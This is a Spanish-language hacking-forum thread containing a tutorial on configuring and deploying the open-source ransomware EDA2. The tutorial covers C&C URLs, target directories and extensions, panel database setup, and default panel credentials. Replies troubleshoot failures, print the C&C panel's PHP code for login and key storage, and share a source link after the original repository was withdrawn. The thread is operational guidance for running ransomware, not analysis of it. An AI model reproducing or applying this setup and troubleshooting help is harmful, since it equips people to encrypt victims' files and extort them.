send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Configurando EDA2

  • 29 Respuestas
  • 11149 Vistas

0 Usuarios y 3 Visitantes están viendo este tema.

Conectado blackdrake

  • *
  • Moderator
  • Mensajes: 1868
  • Actividad:
    15%
  • Reputación 14
    • Ver Perfil
« en: Diciembre 11, 2015, 03:14:59 pm »

Hola a todos, a petición de varios usuarios (@You are not allowed to view links. Register or Login y un usuario que envió un email), he realizado un tutorial básico y rápido de como configurar EDA2.

EDA2, es la versión actualizada de Hidden Tears, podéis obtener más información en estos post:

You are not allowed to view links. Register or Login

You are not allowed to view links. Register or Login

You are not allowed to view links. Register or Login

Repositorio oficial: You are not allowed to view links. Register or Login
Mirror (by @You are not allowed to view links. Register or Login): You are not allowed to view links. Register or Login

Al igual que Hidden Tears, EDA2 es un ransomware opensource con las siguientes características:

  • Utiliza ambos algoritmos RSA y AES.
  • Se coordina desde un C&C
  • Utiliza CSPRNG y phplibsec
  • Los archivos cifrados se pueden descifrar con el software de la versión anterior.
  • Cambia el fondo de escritorio al ejecutarse.

Funcionamiento

1. El ransomware envía una solicitud POST al C&C con la variable del nombre de usuario.
2. El C&C crea la key RSA pública /privada y envía la clave pública para al ransomware y guarda la clave privada en la base de datos
3. El programa crea una clave aleatoria para el algoritmo AES
4. El ransomware encripta los archivos con el algoritmo AES
5. El ransomware encripta la clave AES con la clave pública RSA y la envía al C&C vía POST  NO FUNCIONA A mi no me funcionó y tuve que reprogramarlo para el tutorial (más bien hice una chapuza rápida). Parece ser que envía los campos en blanco.
6. El C&C guarda la clave cifrada AES dentro de la base de datos. NO FUNCIONA  Al no recibir nada, no lo guarda.

Configuración

1. Lo primero con lo que nos encontramos, es la siguiente linea:


Desde esta, podremos modificar la longitud de la clave RSA.

2. Acto seguido, deberemos modificar estas 2 urls por las de nuestro hosting (habiendo subido previamente el panel).


En la siguiente línea podremos modificar la imagen que se pondrá de fondo de escritorio al ejecutar el ransomware:


3. Podremos modificar el directorio desde donde empezará a cifrar los ficheros en esta linea:


4. Además, como en Hidden Tears, podremos modificar la extensión de nuestros ficheros cifrados.


5. Obviamente, podremos decidir que extensiones queremos cifrar, pudiendo añadir o eliminar de la lista que viene por defecto.


6. Además, podemos modificar el algoritmo de creación de la clave, pudiendo poner una por defecto si queremos.


Nota: EDA2 utiliza .NET Framework 4.5, podremos modificar la versión desde aquí:

7. Una vez tengamos el ransomware modificado, debemos crear la tabla dummy en una base de datos llamada panel (obviamente estos nombres se pueden modificar desde el código php, pero son los que vienen por defecto).:


8. Ahora deberemos crear los siguientes campos en nuestra tabla:


Nota: No es necesario darles ese "tipo" de campo, requiere mucho menos espacio.

9. Una vez hecho esto, podremos logearnos en el panel de administración, cuya url sería dominio.com/panel/login.php, utilizando las credenciales por defecto, test:test


10. Este será el dashboard de nuestro panel, donde veremos la información de los infectados.


11.  Verificamos que nuestros ficheros no están cifrados (pues no hemos ejecutado aún el ransomware).


12. Ejecutamos EDA2 y veremos como cambia nuestro fondo de pantalla (por el que hemos seleccionado antes) y nuestros ficheros están cifrados. 


13. Accedemos al panel de administración para obtener la clave para descifrar los ficheros.


14. Pulsamos sobre el botón que dice "Decipher" (Descifrar) y obtendremos la clave necesaria para hacerlo.


15. Utilizamos la clave en el software y listo!


Saludos!
Blackdrake
« Última modificación: Mayo 20, 2016, 04:17:08 pm por blackdrake »



Desconectado Mr.Bot

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Diciembre 15, 2015, 01:46:00 pm »
Hello.

Can you tell me how you get AES Key? I have blank.  :(

Thank you!

Conectado blackdrake

  • *
  • Moderator
  • Mensajes: 1868
  • Actividad:
    15%
  • Reputación 14
    • Ver Perfil
« Respuesta #2 en: Diciembre 15, 2015, 06:31:10 pm »
You are not allowed to view links. Register or Login
Hello.

Can you tell me how you get AES Key? I have blank.  :(

Thank you!

The software automatically generates, you just have to edit the php file that gets for storage in your bd.

Regards.



Desconectado Mr.Bot

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Diciembre 15, 2015, 09:51:51 pm »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
Hello.

Can you tell me how you get AES Key? I have blank.  :(

Thank you!

The software automatically generates, you just have to edit the php file that gets for storage in your bd.

Regards.

Which php file need to edit? I work like on tutorial ... my AES key is only blank.

Conectado blackdrake

  • *
  • Moderator
  • Mensajes: 1868
  • Actividad:
    15%
  • Reputación 14
    • Ver Perfil
« Respuesta #4 en: Diciembre 16, 2015, 09:57:46 am »
You are not allowed to view links. Register or Login
Which php file need to edit? I work like on tutorial ... my AES key is only blank.

As I put in paragraph 5 and 6, the AES key is not sent.

5. El ransomware encripta la clave AES con la clave pública RSA y la envía al C&C vía POST  NO FUNCIONA A mi no me funcionó y tuve que reprogramarlo para el tutorial (más bien hice una chapuza rápida). Parece ser que envía los campos en blanco.

6. El C&C guarda la clave cifrada AES dentro de la base de datos. NO FUNCIONA  Al no recibir nada, no lo guarda.

Basically what I did was edit the php code (savekey.php) to store the AES key in a txt hosted on my server then I stored the data in the db.

You can also edit the code in C # to store otherwise

Regards.



Desconectado simdia

  • *
  • Underc0der
  • Mensajes: 9
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #5 en: Diciembre 18, 2015, 08:47:51 am »
Hello, i got a problem trying to login into webpanel for EDA2 hidden tear online webpanel.
I configured the database and everything correctly, but each time i try to login, it shows the below respone.:


string(4) "test" string(4) "test"
Fatal error: Call to undefined function password_verify() in /home/bialvmlq/public_html/panel/login.php on line 14

Although, i have made several installation of EDA webpanel on 2 different hosts, but still gives same response.

Help please to resolve this issue.
will be appreciated

Desconectado rush

  • *
  • Underc0der
  • Mensajes: 378
  • Actividad:
    0%
  • Reputación 7
    • Ver Perfil
  • Skype: iruxh1773
« Respuesta #6 en: Diciembre 18, 2015, 01:06:14 pm »
can you put the code from this file  /home/bialvmlq/public_html/panel/login.php maybe something is wrong in the file
You are not allowed to view links. Register or Login


Desconectado simdia

  • *
  • Underc0der
  • Mensajes: 9
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #7 en: Diciembre 18, 2015, 04:28:19 pm »
here is the code in login.php:
------------
Código: PHP
  1. <?php
  2.  
  3. You are not allowed to view links. Register or Login();
  4.  
  5. //Username:test
  6. //Password:test
  7.  
  8. if(!You are not allowed to view links. Register or Login($_POST)) {
  9.         $isim = $_POST['login'];
  10.         $sifre = $_POST['password'];
  11.        
  12.         You are not allowed to view links. Register or Login($isim, $sifre);
  13.        
  14.         if($isim == 'test' && password_verify($sifre, '$2y$10$ZzV6jDI5HU.SUrpx0AFoQe9r49NI.NkpH5OhZ28Ug4G0MnmdVKaFy')) {
  15.                 $_SESSION['auth'] = 1;
  16.            
  17.             You are not allowed to view links. Register or Login('Location: main.php');
  18.             You are not allowed to view links. Register or Login;
  19.         }
  20. }
  21.  
  22. ?>
  23.  
  24. <!DOCTYPE html>
  25. <!--[if lt IE 7]> <html class="lt-ie9 lt-ie8 lt-ie7" lang="en"> <![endif]-->
  26. <!--[if IE 7]> <html class="lt-ie9 lt-ie8" lang="en"> <![endif]-->
  27. <!--[if IE 8]> <html class="lt-ie9" lang="en"> <![endif]-->
  28. <!--[if gt IE 8]><!--> <html lang="en"> <!--<![endif]-->
  29. <head>
  30.   <meta charset="utf-8">
  31.   <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  32.   <title></title>
  33.   <style type="text/css">
  34.   .about,.login h1{text-align:center}.about a,.about a:hover,.login-help a{text-decoration:none}a,abbr,acronym,address,applet,article,aside,audio,b,big,blockquote,body,canvas,caption,center,cite,code,dd,del,details,dfn,div,dl,dt,em,embed,fieldset,figcaption,figure,footer,form,h1,h2,h3,h4,h5,h6,header,hgroup,html,i,iframe,img,ins,kbd,label,legend,li,mark,menu,nav,object,ol,output,p,pre,q,ruby,s,samp,section,small,span,strike,strong,sub,summary,sup,table,tbody,td,tfoot,th,thead,time,tr,tt,u,ul,var,video{margin:0;padding:0;border:0;font:inherit;vertical-align:baseline}article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{display:block}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:'';content:none}table{border-collapse:collapse;border-spacing:0}.about{margin:70px auto 40px;padding:8px;width:260px;font:10px/18px 'Lucida Grande',Arial,sans-serif;color:#666;text-shadow:0 1px rgba(255,255,255,.25);background:#eee;background:rgba(250,250,250,.8);border-radius:4px;background-image:-webkit-linear-gradient(top,rgba(0,0,0,0),rgba(0,0,0,.1));background-image:-moz-linear-gradient(top,rgba(0,0,0,0),rgba(0,0,0,.1));background-image:-o-linear-gradient(top,rgba(0,0,0,0),rgba(0,0,0,.1));background-image:linear-gradient(to bottom,rgba(0,0,0,0),rgba(0,0,0,.1));-webkit-box-shadow:inset 0 1px rgba(255,255,255,.3),inset 0 0 0 1px rgba(255,255,255,.1),0 0 6px rgba(0,0,0,.2);box-shadow:inset 0 1px rgba(255,255,255,.3),inset 0 0 0 1px rgba(255,255,255,.1),0 0 6px rgba(0,0,0,.2)}.about a{color:#333;border-radius:2px;-webkit-transition:background .1s;-moz-transition:background .1s;-o-transition:background .1s;transition:background .1s}.about a:hover{background:#fafafa;background:rgba(255,255,255,.7)}.about-links{height:30px}.about-links>a{float:left;width:50%;line-height:30px;font-size:12px}.about-author{margin-top:5px}.about-author>a{padding:1px 3px;margin:0 -1px}body{font:13px/20px 'Lucida Grande',Tahoma,Verdana,sans-serif;color:#404040;background:#0ca3d2}.container{margin:80px auto;width:640px}.login{position:relative;margin:0 auto;padding:20px;width:310px;background:#fff;border-radius:3px;-webkit-box-shadow:0 0 200px rgba(255,255,255,.5),0 1px 2px rgba(0,0,0,.3);box-shadow:0 0 200px rgba(255,255,255,.5),0 1px 2px rgba(0,0,0,.3)}.login:before{content:'';position:absolute;top:-8px;right:-8px;bottom:-8px;left:-8px;z-index:-1;background:rgba(0,0,0,.08);border-radius:4px}.login h1{margin:-20px -20px 21px;line-height:40px;font-size:15px;font-weight:700;color:#555;text-shadow:0 1px #fff;background:#f3f3f3;border-bottom:1px solid #cfcfcf;border-radius:3px 3px 0 0;background-image:-webkit-linear-gradient(top,whiteffd,#eef2f5);background-image:-moz-linear-gradient(top,whiteffd,#eef2f5);background-image:-o-linear-gradient(top,whiteffd,#eef2f5);background-image:linear-gradient(to bottom,whiteffd,#eef2f5);-webkit-box-shadow:0 1px #f5f5f5;box-shadow:0 1px #f5f5f5}.login p{margin:20px 0 0}.login p:first-child{margin-top:0}.login input[type=password],.login input[type=text]{width:278px}.login p.remember_me{float:left;line-height:31px}.login p.remember_me label{font-size:12px;color:#777;cursor:pointer}.login p.remember_me input{position:relative;bottom:1px;margin-right:4px;vertical-align:middle}.login p.submit{text-align:right}.login-help{margin:20px 0;font-size:11px;color:#fff;text-align:center;text-shadow:0 1px #2a85a1}.login-help a{color:#cce7fa}.login-help a:hover{text-decoration:underline}:-moz-placeholder{color:#c9c9c9!important;font-size:13px}::-webkit-input-placeholder{color:#ccc;font-size:13px}input{font-family:'Lucida Grande',Tahoma,Verdana,sans-serif;font-size:14px}input[type=password],input[type=text]{margin:5px;padding:0 10px;width:200px;height:34px;color:#404040;background:#fff;border:1px solid;border-color:#c4c4c4 #d1d1d1 #d4d4d4;border-radius:2px;outline:#eff4f7 solid 5px;-moz-outline-radius:3px;-webkit-box-shadow:inset 0 1px 3px rgba(0,0,0,.12);box-shadow:inset 0 1px 3px rgba(0,0,0,.12)}input[type=password]:focus,input[type=text]:focus{border-color:#7dc9e2;outline-color:#dceefc;outline-offset:0}input[type=submit]{padding:0 18px;height:29px;font-size:12px;font-weight:700;color:#527881;text-shadow:0 1px #e3f1f1;background:#cde5ef;border:1px solid;border-color:#b4ccce #b3c0c8 #9eb9c2;border-radius:16px;outline:0;-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;background-image:-webkit-linear-gradient(top,#edf5f8,#cde5ef);background-image:-moz-linear-gradient(top,#edf5f8,#cde5ef);background-image:-o-linear-gradient(top,#edf5f8,#cde5ef);background-image:linear-gradient(to bottom,#edf5f8,#cde5ef);-webkit-box-shadow:inset 0 1px #fff,0 1px 2px rgba(0,0,0,.15);box-shadow:inset 0 1px #fff,0 1px 2px rgba(0,0,0,.15)}input[type=submit]:active{background:#cde5ef;border-color:#9eb9c2 #b3c0c8 #b4ccce;-webkit-box-shadow:inset 0 0 3px rgba(0,0,0,.2);box-shadow:inset 0 0 3px rgba(0,0,0,.2)}.lt-ie9 input[type=password],.lt-ie9 input[type=text]{line-height:34px}
  35.   </style>
  36.   <!--[if lt IE 9]><script src="//html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
  37. </head>
  38. <body>
  39.   <section class="container">
  40.     <div class="login">
  41.       <h1>Login</h1>
  42.       <form method="post" action="">
  43.         <p><input type="text" name="login" value="" placeholder="Username"></p>
  44.         <p><input type="password" name="password" value="" placeholder="Password"></p>
  45.         <p class="submit"><input type="submit" name="commit" value="Login"></p>
  46.       </form>
  47.     </div>
  48. </section>
  49. </body>
  50. </html>
  51.  
« Última modificación: Diciembre 23, 2015, 03:43:26 pm por blackdrake »

Desconectado simdia

  • *
  • Underc0der
  • Mensajes: 9
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #8 en: Diciembre 18, 2015, 07:41:05 pm »
SOLVED !!
password_verify()  Requires PHP version 5.5.0
When you update the PHP version in your servers settings (PHP Version  settings), It worked.

Thanks all

Desconectado simdia

  • *
  • Underc0der
  • Mensajes: 9
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #9 en: Diciembre 18, 2015, 08:25:17 pm »
Kindly Specify, what should be edited in the below savekey.php file.
Kindly specify the right code.


---------------------------------------

Código: PHP
  1. <?php
  2. if(!You are not allowed to view links. Register or Login($_POST) || You are not allowed to view links. Register or Login($_POST['pcname'])) {
  3.         You are not allowed to view links. Register or Login;
  4. }
  5. $pcname = $_POST['pcname'];
  6. include 'db.php';
  7. $statement = $connection->prepare("select id from dummy where pcname = ?");
  8. $statement->execute([$pcname]);
  9. $id = $statement->fetch(PDO::FETCH_COLUMN);
  10. if(!$id) {
  11.         You are not allowed to view links. Register or Login;
  12. }
  13. $aesencrypted = $_POST['aesencrypted'];
  14. $stmt = $connection->prepare('UPDATE dummy SET aesencrypted = ? WHERE id = ?');
  15. $stmt->execute([
  16.         $aesencrypted,
  17.         $id
  18. ]);
------------------------
« Última modificación: Diciembre 23, 2015, 03:43:51 pm por blackdrake »

Conectado blackdrake

  • *
  • Moderator
  • Mensajes: 1868
  • Actividad:
    15%
  • Reputación 14
    • Ver Perfil
« Respuesta #10 en: Diciembre 23, 2015, 03:53:21 pm »
Check if you get the AES key in that file (save it for example an txt).

I don't remember if I modified the php code or the C # code to send him otherwise. (I think both)

I was made a lot of changes because the code wasn't working.

PD: I remove the code.

Regards.



Desconectado Visa

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #11 en: Diciembre 30, 2015, 07:30:29 am »
Hola.
Cómo elaborar un proyecto en Visual Studio 15?
Crear una compilación de vídeo eda2
Gracias.
« Última modificación: Diciembre 30, 2015, 07:33:53 am por Visa »

Conectado blackdrake

  • *
  • Moderator
  • Mensajes: 1868
  • Actividad:
    15%
  • Reputación 14
    • Ver Perfil
« Respuesta #12 en: Diciembre 30, 2015, 07:38:09 am »
You are not allowed to view links. Register or Login
Hola.
Cómo elaborar un proyecto en Visual Studio 15?
Crear una compilación de vídeo eda2
Gracias.

No entiendo tu pregunta, cual es tu problema? no importa que utilices Visual Studio 15, se puede compilar igual :D

Saludos.



Desconectado Visa

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #13 en: Diciembre 30, 2015, 07:52:25 am »
Lanzamiento del proyecto.
You are not allowed to view links. Register or Login
Hay un vídeo para crear un proyecto?

Conectado blackdrake

  • *
  • Moderator
  • Mensajes: 1868
  • Actividad:
    15%
  • Reputación 14
    • Ver Perfil
« Respuesta #14 en: Diciembre 30, 2015, 09:04:14 am »
You are not allowed to view links. Register or Login
Lanzamiento del proyecto.
You are not allowed to view links. Register or Login
Hay un vídeo para crear un proyecto?

Prueba cambiando el .net framework, como dije antes:

Citar
Nota: EDA2 utiliza .NET Framework 4.5, podremos modificar la versión desde aquí:





Saludos.
« Última modificación: Diciembre 30, 2015, 09:31:55 am por blackdrake »



Desconectado fudmario

  • *
  • Cramel
  • *
  • Mensajes: 185
  • Actividad:
    18.33%
  • Reputación 10
    • Ver Perfil
    • fudmario - GitHub
  • Skype: fudmario
« Respuesta #15 en: Diciembre 30, 2015, 09:18:08 am »
En realidad creo que no es por la version de compilacion de framework.

De la Imagen que muestra el error, lo unico que entiendo es el (404).....xD, aqui tienes mas informacion al respecto: You are not allowed to view links. Register or Login
Es un error del tipo System.Net.WebException, en este caso, es posible que la dirección url  hacia el panel que pusiste en la configuracion no sea correcta, revisa eso.
Mas alla de eso, como recomendacion personal, es mejor que aprendas a  programar y tambien que conozcas como funciona un malware de este tipo,  ya que el proyecto en si no tiene control de errores, por lo cual llegaria a producir varios errores en tiempo de ejecución bajo ciertas circunstancias.


Desconectado Visa

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #16 en: Diciembre 30, 2015, 09:53:41 am »
BLACKDRAKE,FUDMARIO
Gracias por su respuesta!!!
FUDMARIO, Tenías razón!

Desconectado tiamat1

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #17 en: Febrero 21, 2016, 03:11:51 pm »
Muy Buenas, el EDA2 ya non existe en github, hay por ai outro repositorio do codigo fuente ?

Conectado blackdrake

  • *
  • Moderator
  • Mensajes: 1868
  • Actividad:
    15%
  • Reputación 14
    • Ver Perfil
« Respuesta #18 en: Febrero 22, 2016, 07:50:33 am »
You are not allowed to view links. Register or Login
Muy Buenas, el EDA2 ya non existe en github, hay por ai outro repositorio do codigo fuente ?

You are not allowed to view links. Register or Login

"This project is abandoned. If you are a researcher and want the code, contact me with your university or company e-mail You are not allowed to view links. Register or Login"

Sorry.



Desconectado fudmario

  • *
  • Cramel
  • *
  • Mensajes: 185
  • Actividad:
    18.33%
  • Reputación 10
    • Ver Perfil
    • fudmario - GitHub
  • Skype: fudmario
« Respuesta #19 en: Febrero 22, 2016, 04:41:35 pm »
You are not allowed to view links. Register or Login
Muy Buenas, el EDA2 ya non existe en github, hay por ai outro repositorio do codigo fuente ?

si quieres el codigo fuente, aqui lo tienes: You are not allowed to view links. Register or Login


 

¿Te gustó el post? COMPARTILO!



Configurando Hidden Tear (Online)

Iniciado por blackdrake

Respuestas: 15
Vistas: 6456
Último mensaje Mayo 17, 2017, 03:35:56 am
por cristobal92
Configurando Hidden Tear (Offline)

Iniciado por blackdrake

Respuestas: 15
Vistas: 7291
Último mensaje Febrero 24, 2018, 02:23:34 pm
por Manzana
[VIDEO] EDA2 new version (hidden Tear) Ransomware Open Source

Iniciado por GreyCod3

Respuestas: 2
Vistas: 2463
Último mensaje Abril 30, 2016, 05:14:45 pm
por facutota